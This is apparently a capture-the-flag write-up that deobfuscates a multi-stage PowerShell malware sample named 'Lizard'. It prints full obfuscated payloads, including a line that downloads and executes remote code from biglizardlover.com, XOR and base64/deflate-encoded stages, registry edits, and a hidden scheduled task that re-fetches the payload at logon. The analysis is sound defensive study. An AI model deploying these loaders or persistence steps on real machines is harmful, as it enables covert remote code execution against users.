échange floral 🐛
🥑 whoami 🥝 Posts 🍀 Plants ☔ Categories 🐝 Culture 🍂 CTFd
échange floral 🐛

Contents

Contents

Malware - Lizard

 included in  category Malware
     881 words   4 minutes 
Contents
Bug

beware malware!

We start from this payload which curl an endpoint and execute it’s content. It is most likely a PowerShell script.

irm biglizardlover.com/gecko | iex

Instead of executing it, we can write the output in a file to analyze i:

irm biglizardlover.com/gecko | Out-File script.ps1

Look at him ! 

.( ([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN'') ( ( '12G10G4}12I8b73G98G122&22&111f99f65f95G92,73f79,119,24&0y30z26f0,30&25,113y1z70G99I101I98b11z11&5,12f4&98G73z91}1z99f78z70y73}111y120y12r12}69f67I2I79&99&97,92G94G105z95}127,101z67r66b2,104}105r74I64f109z120y73f127b88I94y73}109G97y4I12}119&69,67}2z65f105r65y67r126y85y127G120,94I105r77I65y113f119b111b99,66z122f105r94,88r113y22r22,106r94b67&65z78I109&95&105f26y24}127z88f126&101&66G107G4y11b72&122&122,78}120b7b98y107&106I100I27,66z122&24&85z69z64f121r24&95z84z88r66,117z105}106}103&111r73&97b69&107z78r101z64y103&101f105G29}75f93f118I92G107b91}88G75b66,118I92}94I84&30f110f30z124&125y27,103y89y3r31,88z29,84&89z117I65G28G126y72}94z96r89&74&30r66r74G65r7I24f91f121f77,72b30z101b91,65G73}71f28G125b30}31b30G94,98,29r89&88&20r92f73z122y116z92b122b73b122,85I122I31I77}67G20}93}71&93&3G77y70r106f31f86}121r109&85y24&103f111b109}75z91r125}99r95I28I111r68G31}124z120f100I105}30r122z125I93z20f111}101r122r109}116I109r91z73&75r121I99&106,86}7&98,94z67,78y78z124r94I70f121f125I93I99z91I21G86G25b99f102z124y104&79y97I84}75b28}84}20G104&116y24}77&116b75&122G26f72f7I75z25z86y94r24z97G105z123,78&88f106&30f78r92f122r69z31&103&79}109I66&3&72z30b26f125G21r24G102}110}27r66&67}31G86}101f25r111r106,88&74}72y88G77b122y25,70r67r69b124b75I28&109y105y99I122,7r102y66r109&97f24,118I123I31b85z103f93&66}117y26y93I68b92G24b74,117I90&91I84,97G77f109r105G116G109z75&125y106y98y78,124}100y111z24r107I28G91r21b100}86z70I121f20r101G104&104f103f106y122z107y92z25,96I98&85I98}103r69G92f127,25G24G124f68y116&107}116r101G28f86r107,117G86y107r27,73z116&67}79b93f68&116,3I74r25G68b90z120f75z7,78z126b77b21I94f95I124,94G29f74I3y75I124}89z93&72I105&64}109y74,31,95I124&95z121f89b20z102f102,64I64z79f109z125}79G72I105y121}85I96G20f65}109,117b126r73&27y88r124y71b97z107b126f127f25I121&86&110}78,27r31z107&110G85r21}66,27G120G65,126z74f103,69b109b125y27f106}71&123f77r96f122,110I90,126r117r70z25z123y122G117f20b127y68}107,85r121}109I118G25z86&89f78y64r20r71r96y103G127&118I103G64G30&94I126f78b126y117I27r26b85f99,21,105G121,94f78&24r109b95f29z122f71I102I89I84r29r93f71f7r98b27,92G109b118&21}122&24G25G69,117b91f101,65f127}24b67b7I26f91f69r120y101z86f67y21,71,111&122}120G120r106f124}109y21r69b90I110y121y102G92f67f122f92z98&86}72f124y21I85&94I69&125f68y71z30r86y123,124f73b66}104,31I124b109r68I28z71f124I104f73I77r111&92G78,29}70y65r86b123f84}116r79r118}84y96y64&72}106&28}28z75&66r68f78&65y102z117b31b97z67I89z79,25z25y67b121f28,86&64r71r106z27&101G91G88G25}26r90,110z24}102r124}71}127&26y106y97G118G90f127&93z89f29b89I90&29f30z90r73b31z116&64G104b90&93y85f104,94,109}77,104,124I29I107,66G100y27}68b65y77G120r29I126&110z68G86,89y20y29f26y31f30y7r122z96f70r73G90f122}77r25z70z77}84z116r100f117&90}7,85f65b97y99b25&29y101,73r116I110}100}107r99G126I107r21y120,89&101z66,86}111z93I102,109&117y31}125b78r25,68z94,66&28y74r116,64y71b31f25I96z89&70b72y96}90G31G68z28f85b117I64G99b24z103b79G104}68f101z124I74&74f75b97I97f21I109,75,74r79&105G109b20r89}97I109G7f29I85y101f68r95&25}100I126r77r64G72,25&102,122G116z93f29r98}104,28,127y75,106y7r122y90,29&127b64,126}21r89r77I29}31r120y117G73b20b66y116z102G31G93z3&93I90G72b102y92}99z93y72f74z64z64&110z66b31z98r107r79&95I30G110r125}24r105&77G100}85z65b31,7z101,72z71I78,104&109}31b102z124y79G29f30G120G25b127G127r79I104&68b78y91r86,102&89I71b68&125z94,28r66f95G68z85r85I28f97r72,71z68z91G117r69f31G75}127}85G67}27G65y106f117,64I31z85I98&86&84}3y27y28f64f85z24f24b84&30r107z68z116I64&120y125,106b97&70f124&111,106,64f85,21z102}66}29f106I127}127G27,99}109r99y78I121,109y72y106I91f71G93y121z7I89b117z71y102r7I20}111y94b66}116f24I103G21b78,24r124f123r88&118b105f27&94f90b90&69f30I110}28r31r104r93G104,123G98y30,94z89I122&66&123b125,126z117y121,20r111G106r72f107}99I103y92I90}126&109r127b95r92I88&77,111&123}109y101I72z117G69f92&7z110I70}93r127y21,67f120&26I121G116G69,122r28,109I68r91f95b111G89,111,91r126z72f28I102f28,7r126f94&70z99,107,107z94}97r70I86G73f123,100z30b71}70b93b123f71}79&104G79b73r86r67G96G21,7b86}78I66&89r25,84f122G31I67G122&68}78b95,121y121&117b127z103z89r77,97z28r95r73z124z88z7}31y102y105}71z21,100}86z70r30y64b123z110&100I92z29}72}105f86y100b88I29z94z105&97f73y92f124G7,90,64b85y24I91,27G98}122&126}94b74I103y101I73b25f97r85b29}121I103,96G102z109I74G65f96&7r72r89y74y73r25b77}75G66f105,123b88G21y125z78}121G72G31G111G31G107G20G24I89b78&26I116z110b85}3b72f74&94z3b66r67,24}100}78f73G117I73y25I116&107&93f78&102z120}92&66&24&94r3f86&97b123I97G91b68b111r101r27z77&105,122,84G99z126&127b121y98r105z107z102r94,20I68f78G94f111}96y79I67y31r79I7y92f3b78&88b25G98y73,74I101I116f20y126&98b25f116,24y96,86G121z122y25f111r102,24}29b66&86}7y117z7,95,95G21r24I116&105G72&102&105,84&89r64b3,68f107}24}77z31I75I121b95&73y123I30&121y25&98,122z72y20}102}31G21I29I117&111&116&30}98b110z110z109y90G109y7b118r69&7&74y89f107,88y74r120f84y78y75f97r104y72z91b118z72f85z72,103,124}85&68z27f95G92&86I88r79I124r91&24y74I106y91}7&116I71G126f64y116&95z90I102z107}28}21&28b96z111r94r69,31,89,89r110r66r70&88,20y104&110&85I90f75,124y71&90z77b90y29I101}70b118&27f7&74}66I72,102I103r126b122I103r118,70f27r7f125}89b97z120G79&3b91G104I66&24}104z91z17z17I11G5,12r0z119z95z85r127b120&73&97G2r101}67f2}79b99}65b124}94G105&127G127,69G67&66f2z79y67y97r124z94}73G95I127z69&67z98z65,67,104z105b113,22z22I72b105b111,99G65}92b94y73z95}127r12&5b12,80z106z67y94&105f109f111}68b1G99I110z102f73r111f120z12&87&12&98G73G91z1,99f78,70I73}111y120y12G12f101f67&2I95b120&94r73y77r65z94,105b77&72r105r126&4r12z8I115z0b119,120}105z84,88G2}105z66f79,67,72f101r66}75,113r22f22z109z95}79r69z69}5y12f81b80b106b67&94z105}77,111I100y1b99,78I102f73z111z88f12&87&12G8r115,2y126f105b109b104G120,67&73I98}72,4G5}81I12,5}12'-SPlIT 'g' -spLiT'R'-sPLiT '&'-SplIt ','-sPlIt 'Y'-SplIT 'z'-SPLIT '}' -sPlIT 'i'-SpliT 'F' -SPLit'b'|% { [CHar]( $_ -bxoR  0x2c  ) } )-jOIN'')

This payload concatenate words in order to form the word iex to execute the following payload. We can also see that the payload is encrypted with a XOR (bxoR 0x2c).

I replace .( ([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN'') by Write-Host to disarm the payload and just print it. Let’s execute it:

.\decoded.ps1
 &( $eNV:COmspec[4,26,25]-jOIN'') (New-ObjeCT  io.cOMprEsSIon.DEflATeStreAM( [io.mEmoRySTrEam][COnVErt]::FrombAsE64StRInG('dVVbT+NGFH7nV4yilU4sxtnYEFKCeMiGbIlKIE1gqZpGwtgnZprx2B2PQ7Ku/3t1xuYm0RdrLuf2nfm+4wUad2Iwmek0Q232rN1ut8peVXpVeVyV3ao8qkq/ajF3zUAy4KCAgwQOs0Ch3PTHE2VQq8CIVAXAwegUOFz+NrobbPrjUQqOw9z5OJPDcMxg0x8DX4aXgV6d+g5zr4MEWbtF2bpVi3KcAn/d26Q94JB7no3zI5CFtfdtaV5joiPg0AEOV+JnAM4ZW3yKqnY6qhp4fYvwxMaAEXAgQFNbPHC4G0w9HzjU8IDDKFVGp5LNyNKipS54PhXGXI0zGYzG7eXocqhX/f5hvTg+bRa9rsPr1f/gPuqdElAf3sPsUu8JJllcAQcdEUyL8mAYRe7tPkMGRS5UzBb73GBy9n7TmRfKiAQ7FkWaLVBvRYj5WVY8ShGyUAZ5zubl8kLKSZKl2rRbRY76yO9EUrb4As1VkJux1qk+N7pAZ9V45iYwImS4o+6wiTIzo9kCVTTFPA9ivBUJpoVpNzdP9yriQhk2zWPenD3PAh0kPDeaCpb1jmzWxXcZxLldF00gnhbmJY3Mouc55oU0zlkF7Iwt56vB4JPkS6FMZvSqu1uv12ve3XlDvqyDrAaDP1GnH7hmaT1RBhzu81632+VLjevVa5jaxXHYv+ymMO51IeXBHGORG9TuInzCqJAY3Qb5hrn0fXlk35LujdLv3h0yYlO4KcDhIPffgMM9AgfcEA8uMA+1yIhs5HRald5JVXq1ND0SgF+Vv1SlR9ua13TYe8nXJ3q/qvdJpOqdfllBn3NGcs2BQ4EaHym3+IdkbDA3JPc12T5SScDhbwzJukhQr0nshyy0MdkhwYi3gSyo7mFYl3yNzx/70ly44x2GhXlTQFMjPCFly9Jn1FSS7OAObUAdFwkqU+uYkJ+8CrnX4K9b4PWtZE7rvvi2B03DqDWN2ruVnWQRYU8CFdGOKpvRASsptaCWAIdYip+BjqS9oT6UXiV0AhwsCuCwRd0J0+RrjOGGrMjzeWH2kjqWkcDcezoL9+zbnu5xV3oVhbsUUYSKuaM0sePt+3JEk9Hzj2lWBHp1dEzHt1rEMepP+vly4w7NVRrfKIe5My1UKLJAfmL+dufe5agnEWt9QbUd3C3G84ub6XBy/dfr/no4HbeYe5XGqbJTpn4r/zMWMwhCI7aEVxORSUNEGJr8hbrCLco3c+p/bt5NefIX8RN5X4LzUV5CJ41nz+Y+ss94XEdJExul/hG4a3gUseW2U5NVd8J391YCX2NBBAvA+Zi+fuGtfTxbgMDdwZdydKPyh7spztcPw4fFw+XkRlXsvJG090LCri3uuBnjt8DByvgPkvav1IjZ7+fndJKRVKZj7+QuMTc/wDn4Dw==') ,[sySTeM.Io.cOmPrESSion.coMPresSioNmoDE]::dECOmpresS ) |ForEACh-OBJeCT { New-ObjeCT  Io.sTreamrEadER( $_,[TExt.EncodIng]::Ascii) }|ForEaCH-ObJeCt { $_.READToeNd()} )

Again, I remove the executing part to disarm it: &( $eNV:COmspec[4,26,25]-jOIN'')

Write-Host (New-ObjeCT  io.cOMprEsSIon.DEflATeStreAM( [io.mEmoRySTrEam][COnVErt]::FrombAsE64StRInG('dVVbT+NGFH7nV4yilU4sxtnYEFKCeMiGbIlKIE1gqZpGwtgnZprx2B2PQ7Ku/3t1xuYm0RdrLuf2nfm+4wUad2Iwmek0Q232rN1ut8peVXpVeVyV3ao8qkq/ajF3zUAy4KCAgwQOs0Ch3PTHE2VQq8CIVAXAwegUOFz+NrobbPrjUQqOw9z5OJPDcMxg0x8DX4aXgV6d+g5zr4MEWbtF2bpVi3KcAn/d26Q94JB7no3zI5CFtfdtaV5joiPg0AEOV+JnAM4ZW3yKqnY6qhp4fYvwxMaAEXAgQFNbPHC4G0w9HzjU8IDDKFVGp5LNyNKipS54PhXGXI0zGYzG7eXocqhX/f5hvTg+bRa9rsPr1f/gPuqdElAf3sPsUu8JJllcAQcdEUyL8mAYRe7tPkMGRS5UzBb73GBy9n7TmRfKiAQ7FkWaLVBvRYj5WVY8ShGyUAZ5zubl8kLKSZKl2rRbRY76yO9EUrb4As1VkJux1qk+N7pAZ9V45iYwImS4o+6wiTIzo9kCVTTFPA9ivBUJpoVpNzdP9yriQhk2zWPenD3PAh0kPDeaCpb1jmzWxXcZxLldF00gnhbmJY3Mouc55oU0zlkF7Iwt56vB4JPkS6FMZvSqu1uv12ve3XlDvqyDrAaDP1GnH7hmaT1RBhzu81632+VLjevVa5jaxXHYv+ymMO51IeXBHGORG9TuInzCqJAY3Qb5hrn0fXlk35LujdLv3h0yYlO4KcDhIPffgMM9AgfcEA8uMA+1yIhs5HRald5JVXq1ND0SgF+Vv1SlR9ua13TYe8nXJ3q/qvdJpOqdfllBn3NGcs2BQ4EaHym3+IdkbDA3JPc12T5SScDhbwzJukhQr0nshyy0MdkhwYi3gSyo7mFYl3yNzx/70ly44x2GhXlTQFMjPCFly9Jn1FSS7OAObUAdFwkqU+uYkJ+8CrnX4K9b4PWtZE7rvvi2B03DqDWN2ruVnWQRYU8CFdGOKpvRASsptaCWAIdYip+BjqS9oT6UXiV0AhwsCuCwRd0J0+RrjOGGrMjzeWH2kjqWkcDcezoL9+zbnu5xV3oVhbsUUYSKuaM0sePt+3JEk9Hzj2lWBHp1dEzHt1rEMepP+vly4w7NVRrfKIe5My1UKLJAfmL+dufe5agnEWt9QbUd3C3G84ub6XBy/dfr/no4HbeYe5XGqbJTpn4r/zMWMwhCI7aEVxORSUNEGJr8hbrCLco3c+p/bt5NefIX8RN5X4LzUV5CJ41nz+Y+ss94XEdJExul/hG4a3gUseW2U5NVd8J391YCX2NBBAvA+Zi+fuGtfTxbgMDdwZdydKPyh7spztcPw4fFw+XkRlXsvJG090LCri3uuBnjt8DByvgPkvav1IjZ7+fndJKRVKZj7+QuMTc/wDn4Dw==') ,[sySTeM.Io.cOmPrESSion.coMPresSioNmoDE]::dECOmpresS ) |ForEACh-OBJeCT { New-ObjeCT  Io.sTreamrEadER( $_,[TExt.EncodIng]::Ascii) }|ForEaCH-ObJeCt { $_.READToeNd()} )

which renders as:

.\stage3.ps1                                                              

Set-ItemProperty ((("{5}{1}{4}{0}{3}{2}" -f 'l ','n','l','Panelk7EInternationa','tro','HKCU:k7ECo')) -REplAcE 'k7E',[cHar]92) -Name ("{1}{0}"-f '9',("{1}{0}" -f '5','s11')) -Value ("{2}{0}{1}" -f 'rd','.','Liza'); Set-ItemProperty ((("{2}{0}{3}{5}{1}{7}{4}{6}" -f'C','anelM','HK','U:M12','Intern','Control P','ational','12'))  -rePlaCE([CHAr]77+[CHAr]49+[CHAr]50),[CHAr]92) -Name ("{1}{0}"-f '359','s2') -Value ("{0}{2}{1}"-f 'L','rd.','iza') #value HKCU:\Control Panel\International -Name s1159 -Value Lizard.


Add-Type 'using System;using System.Runtime.InteropServices;public class R{[DllImport("user32.dll",SetLastError=true)]public static extern IntPtr SendMessageTimeout(IntPtr hWnd,int Msg,IntPtr wParam,string lParam,int fuFlags,int uTimeout,out IntPtr lpdwResult);}' ; [R]::SendMessageTimeout([intptr]0xffff,0x1A,[IntPtr]::Zero,("{1}{0}" -f'l','Int'),2,5000,[ref]([intptr]::Zero)) | Out-Null


Register-ScheduledTask -TaskName ("{2}{3}{1}{0}" -f ("{1}{0}"-f'p','acku'),'lyB','We','ek') -Description ("{9}{16}{11}{4}{10}{12}{8}{14}{13}{5}{0}{15}{3}{1}{7}{6}{2}" -f 'hion','n','l',' u',' = o','s','uerebe','iq','ttest ','fl','b','e','jec','sumerfa','+ con',' +','agvalu') -Action (New-ScheduledTaskAction -Execute ("{1}{0}{2}" -f'hel','powers','l.exe') -Argument ((("{10}{6}{3}{5}{15}{14}{1}{13}{17}{2}{9}{8}{12}{7}{11}{4}{0}{16}" -f'0} ','ndo','mand ','tionPo',' {','li','u','glizardlo',' b','{1}irm','-Exec','ver.com/gecko','i','wStyle','pass -Wi','cy By','iex{1}',' Hidden -Com')) -F[CHar]124,[CHar]34)) -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Principal (New-ScheduledTaskPrincipal -UserId "$env:USERDOMAIN\$env:USERNAME" -LogonType ("{1}{2}{0}" -f ("{1}{0}"-f 'active','r'),'Int','e') -RunLevel ("{1}{0}" -f'st',("{1}{0}"-f 'ighe','H'))) | Out-Null


irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i')) | iex

${COns`UMeRf`A`S`HIOn} = ("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')

  • écrit deux valeurs dans le registre utilisateur (``) ;

  • It writes two values inside HKCU\Control Panel\International. They are s1159 and s2359, which are replaced by Lizard.. They are responsible for the AM/PM formating in the Windows Task bar.

  • Create a scheduled task WeeklyBackup which runs powershell.exe at startup to execute powershell code. Here is the scheduled task:

    The scheduled task executes irm biglizardlover.com/gecko | iex.

  • The last part is a base64 string. Let’s output this with this:

 Write-Host ${COns`UMeRf`A`S`HIOn} = ("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')

Which gives us WXpBME16UmtOVGt3TWpnPQ== that can be decoded from the base64 as c0434d59028. It might be a part of our final flag.

On the line 12 above, we can see that another irmcommand is executed: irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i'))

We can start from this piece of code found in the stage 2 and output the result in the terminal:

irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i')) | Write-Output

The ouptut:

$TFr1S = " )'X'+]43[EmOHSP$+]12[EMoHSp$ (&| )93]rAhc[]Gnirts[,)28]rAhc[+78]rAhc[+401]rAhc[((eCaLpER.)'|',)58]rAhc[+401]rAhc[+37]rAhc[((eCaLpER.)'$',)75]rAhc[+97]rAhc[+27]rAhc[((eCaLpER.)43]rAhc[]Gnirts[,'Ywo'(eCaLpER.)')RWhRWhnIOj-RWhXRWh+]3,1[)ecnerefERPEsOBrev9OH]gniRTS'+'[( (&Uh'+'I '+'Ywo ) RWh RWh RWhsFo:ElBairavRWh METI-tEs(9OH Ywo+ )}'+')RWhd2x0RWhRoXb- _9OH (]raH'+'c[{hcaEROf UhIRWhgRWhTILps- RWhURWh TIlPS-RWhcRWh ti'+'Lp'+'S-RWh-RW'+'hTilps-RWh'+'JRWhTILPS- RWhB'+'RWhTILPS-RWhwRWhtIlpS-RWh%RWhTIlpS-RW'+'h<RWhTILPS- RWhoRWh TIlPS-RWh9'+'3-51B02<49-601B721U521g96'+'j46O321C711W56B321%99j911B39B221O121C09g92j07-67j89C99'+'g78%87'+'U78%66<701C67O52O82W46O221C51-31%61j31g'+'98<49-27<121B98%87B27U17j97g66U9W93%08g93%76-27<37W37-86W101j31j27O56%48-98g621j09%66C37%76g86g221C0C'+'31O09U66W97-56<27<27g37<86B56O47W9O31j1O01%37%76B67g46C46-66j011C0-01O3'+'1B98-4'+'9C'+'86g79W98j'+'76j27-46B88W47%59j801g0-31j56C56-27%96W49-59<27O09%66W39<31j49%49O27C87'+'j66g59<521<0j98O59<67j98W621<31-31-31B31C93B56O56B88j99%0W98%88'+'C'+'89C31C18'+'<31-4-13-6U82W1'+'B37j76g27C39<27W3'+'7B98j96j47W86%56-86U09U98g9U1<92C1B92O13W5O66g57'+'%76%001j4'+'9U59O27O98g27C46'+'B67%59-67g521j46j27W98B'+'49W48-621g32g32C211W'+'22'+'1-811<31W22-51W08-31B22%4<86U7'+'6C001B76j86j221'+'W88g57%31j98B76j86O1g46W67-59B67W521B19j39<56g31W47U76-86B59U98B49g1O46<67W59O67C521C88%31-98j76B86C1B76j66j86B98O87-8'+'01C8'+'8O31j98B76C86B5%66W57-76<001W49U5'+'9O27g98B27W46C67-59W67-521C46-27U98%49-48g621%31C56O66C66'+'j97B31U76W59B27U98j58W27O'+'31-87W86g98O67C98W49O31O87j86-56j97-88g39C31B211C4W51-77j56C56U37%3g'+'13<03-5'+'9j27<49-8'+'8O51U77g5-98-59W66%39g46'+'g001C56U56<501g811g31O68O31j221%31g49-49O67W56B87W31W87j86-56U97W88%39C31O22-49<27j87B86j19<5'+'9C27B621<39O66g59C27j98B76W001U3W27W46U86B98O76<88%721j3W46<27%98g49<48U621-31O47W76W86W49<88U'+'31B22U46B27<98O49U'+'48-621U31C47C76g86O'+'49O88O51O31U76j6'+'6<86O98g86B76U86<57C27<501O27B39g48<12'+'1-0j31%27O39j48%121g0U3'+'7<3'+'7%801B31C31B31g31<93g56j56%88'+'B99g0%98C88j89g31U18-31<27j88<76O86j98C76j66j011<48g5'+'6-9'+'8-76<27O56B86%621<31U76%66U86<9'+'8g87g801O59U66j59<59g401U0g31B37<76C27'+'U39<27C37-'+'98<96%47%86j56W86'+'C09U98<9-31'+'B27g56'+'O86j701g98-88W89<0j'+'31g48C98W59-67O39C98<49U67W27j57W48j58B67B56C67U47%9U31g98%49C27W88-29U27C721O97-27U221<0-27U07-66C19W76U001<31-31U31%31W93<51C47C39B17g3O27O78U86%76<47U66O87j27U59O98O86<88-87W49O86%97W9-37C59-67B'+'78-86B56W2j47g46%86<2<46U66%87%3C59O27<19B66-56g37W59W67B78O'+'86B56j47j86g97<'+'2j2%32j49-39U98j98<96<51-31%61C31-'+'48j98<59B67<39j'+'98%49g67<27<57<4'+'8j58-67U56g67j47O9W31-31-31O31g93C42g13<31j46W88C46%86U58-67O69g'+'0C31B82j31O46B88'+'U46U86C76O86B69W0'+'B31g46j66%37%7'+'6C67U721j0-98W27W601W31j61O31g27B78%86j76O47g66W87W27%'+'59g98g86U88<87U49'+'U86B'+'97g9C31-31-31%31W93j51-47C39W17-3W37U59C67B78g86'+'B56<51g31j521j69j401%121U32<19C76<27'+'W9C3'+'1-96j98B67O5'+'21U0<76-86U66j301-31g'+'61%31g37O76U27C39C27%37j98W96<47g86<56B86g09O98-9'+'B31O31<31%31-93%4B4U4B4W49<47C76'+'C86g59g98-621O31U48<98<59C2'+'7B39<66j59j521j37g76<67W39O58U'+'40'+'1<0%31O98j87j27<17-97U89g0U98j87j27C56U27O621B31<18j31-98%58g98'+'-31%27g39O48%121W0C31<46-66j87O3j59W27C19j66W56W37U59-67j78C86<56C47C86-97j3U02W69j711-97U86g911O76U621%321-56C56%97g221O37g701U321g31U27W46W67B99-49j76%501W0-27C19C56j66W4'+'9C27B721j5O5g47C76-86g59C98U621O52-72<27W49W67<111%46U66'+'j59W'+'7'+'01<32%32O211W98U59B27j1'+'9g76g66B011B3'+'-46j27g98B49%48C621B811C5g47W76j86B59U98<621W98W27O601U3j12C701%'+'121-021U32%32j211<47W76O86B37g66C87W76O401B3U98C58j27C121%3%46B27C98U'+'49<48O621W811W5<31B58g27W86j31<61j31C'+'09W66j97O56j27B27'+'W37C86<56O47B9B31B31-31U31C93g68j31%4C27%88j59<98%9C5U31O27<56-86U96O09RWh (]gNirTS[+ Ywo ) RWhRWh  RWhS'+'foRWh  ELBAIrav-TeS(9OHYwo'( ";  -JOIN (  vArIABlE  tfR1s  ).VaLUe[-1..- ((  vArIABlE  tfR1s  ).VaLUe.leNgTH)]|& ( ([sTriNg]$VERboSEPrEfeREnce)[1,3]+'X'-joiN'')

another round! just replace the & ( ([sTriNg]$VERboSEPrEfeREnce)[1,3]+'X'-joiN'') at the end by Write-Output and we get the 5th stage

 ('owYHO9(SeT-varIABLE  hWRof'+'ShWR  hWRhWR ) owY +[STriNg]( hWR90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W'+'72B72j65O79j66W90'+'C13j16<13j68W72g85B13<5W118W126O84<94'+'U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121'+'%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-'+'3B110B66g67g9'+'1j72B95U89W112O23%23<10'+'7'+'W95j'+'66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C9'+'4W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-'+'89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<1'+'04'+'U85O93W76<67g73j125j95j66<93B7'+'2C95<89<84U13O126-89g95g68C'+'67C74<94W4B4U4B4%39-13%13<13O13B'+'9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16'+'g13-103j66U68-67<0U12'+'5O76B89j69-1'+'3C9W'+'72<67C91<23U121%104j96j125j13g15<65B'+'68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79'+'B68U'+'94U78<88U68g89g95'+'%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C6'+'7%73%66j64g13B'+'0W96B68O67C68U64U'+'88B64O13j28B13C0'+'g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j8'+'4<75<72<76g94%89'+'j93<76B95<89j84'+'-13C16%13-15<69<89j89U93-94j23%2j2'+'<79g68j74j65B68'+'O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87'+'B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13'+'j0<98W88-89g107j68O'+'65g72B'+'13-9<89U90C'+'68W65j68%74%69<89'+'-73C72<93U'+'72C67<73B13g0U104g95<95j66U95O108g78g8'+'9<68U66%67U13<126%68B65O72<67-8'+'9-6'+'5g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B'+'88%65j65g39<13g13B13C13B108%7'+'3<7'+'3U0g121%84j93O72%13j0-1'+'21<84g93B72O105<72C75<68U67B68g89O68<6'+'6j67U13O15O88O94'+'O68g67C74C13U126-84'+'U94O89<72B64U22B13'+'U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j72C95g66O93<126B72C9'+'5<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g'+'64g93%66W95-89-5g77U15O8'+'8-94<72j9'+'5-30<31'+'g3%73U65C65j77-15W4C112B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13'+'O72W85j89U72B95W67U13B79j'+'66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O9'+'5U94W100<67-75W66%5B68C67B89j13O8'+'8C10'+'8-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W'+'122j68j67B100C6'+'7U68<4%22B13-80W15-22W13<118-1'+'22'+'W112C23g23g126-84W94'+'B89W72j64j125g76-95%76B'+'64C72g89O72O95U9'+'4j100%67%'+'75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B7'+'3W72<93C72g67j73B'+'1W28U6-31-4-13<'+'81C13C98'+'C'+'88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j'+'78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67'+'j89W97g68'+'C9'+'4-89B1'+'3O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13'+'C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89'+'g13j16%13-15C122O64W28O25O76C107<66%87U'+'78%87g'+'99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j'+'69g125U127B106-94<20B15-3'+'9hWR-SPlIT hWRohWR -SPLIThWR<h'+'WR-SplIThWR%hWR-SplIthWRwhWR-SPLIThWR'+'BhWR -SPLIThWRJ'+'hWR-spliTh'+'WR-hWR-S'+'pL'+'it hWRchWR-SPlIT hWRUhWR -spLIThWRghWRIhU fOREach{[c'+'Har]( HO9_ -bXoRhWR0x2dhWR)'+'}) +owY HO9(sEt-ITEM hWRvariaBlE:oFshWR hWR hWR ) owY'+' I'+'hU&( (['+'STRing]HO9verBOsEPREference)[1,3]+hWRXhWR-jOInhWRhWR)').REpLaCe('owY',[strinG][chAr]34).REpLaCe(([chAr]72+[chAr]79+[chAr]57),'$').REpLaCe(([chAr]73+[chAr]104+[chAr]85),'|').REpLaCe(([chAr]104+[chAr]87+[chAr]82),[strinG][chAr]39) |&( $pSHoME[21]+$PSHOmE[34]+'X')

another round! replace &( $pSHoME[21]+$PSHOmE[34]+'X') at the end by Write-Output. Just another stage

